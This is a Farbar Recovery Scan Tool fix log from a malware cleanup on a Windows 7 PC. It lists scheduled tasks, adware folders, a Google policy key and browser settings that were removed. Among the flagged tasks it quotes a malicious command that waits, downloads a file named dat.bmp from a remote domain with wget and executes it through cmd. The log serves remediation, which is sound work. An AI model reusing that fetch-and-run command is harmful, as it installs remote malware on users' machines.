Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 04-01-2015 Ran by Maciej at 2015-01-06 18:10:59 Run:1 Running from C:\Users\Maciej\Downloads Loaded Profile: Maciej (Available profiles: Maciej) Boot Mode: Normal ============================================== Content of fixlist: ***************** CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp <==== ATTENTION Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7 Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com C:\Program Files\Probit Software C:\Program Files\unisaLees C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\17691939238860040889 C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol C:\ProgramData\APN C:\ProgramData\EpicScale C:\Users\Maciej\AppData\Roaming\Easeware C:\Users\Maciej\AppData\Roaming\SkypEmoticons EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. "HKLM\SOFTWARE\Policies\Google" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2AA368BC-A77B-47EB-9ABD-5CEC742BDC74}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AA368BC-A77B-47EB-9ABD-5CEC742BDC74}" => Key deleted successfully. C:\Windows\System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A78CDB68-B25E-4572-9104-03E726D960DC}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8DF6F1AC-6266-46C0-A0E5-736B5F75AC67}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DF6F1AC-6266-46C0-A0E5-736B5F75AC67}" => Key deleted successfully. C:\Windows\System32\Tasks\DriverEasy Scheduled Scan => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverEasy Scheduled Scan" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AB6E172A-57D0-48B0-98D6-96DBF75A66D8}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB6E172A-57D0-48B0-98D6-96DBF75A66D8}" => Key deleted successfully. C:\Windows\System32\Tasks\SYSTEM => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E}" => Key deleted successfully. C:\Windows\System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{FACA796A-C22B-4C08-8837-473AAF64DABD}" => Key deleted successfully. C:\Windows\Tasks\DriverEasy Scheduled Scan.job => Moved successfully. HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully. HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully. HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully. HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully. C:\Program Files\Probit Software => Moved successfully. C:\Program Files\unisaLees => Moved successfully. C:\ProgramData\dat.bmp => Moved successfully. "C:\ProgramData\wget.exe" => File/Directory not found. C:\ProgramData\17691939238860040889 => Moved successfully. C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol => Moved successfully. C:\ProgramData\APN => Moved successfully. C:\ProgramData\EpicScale => Moved successfully. C:\Users\Maciej\AppData\Roaming\Easeware => Moved successfully. C:\Users\Maciej\AppData\Roaming\SkypEmoticons => Moved successfully. EmptyTemp: => Removed 323.3 MB temporary data. The system needed a reboot. ==== End of Fixlog 18:12:10 ====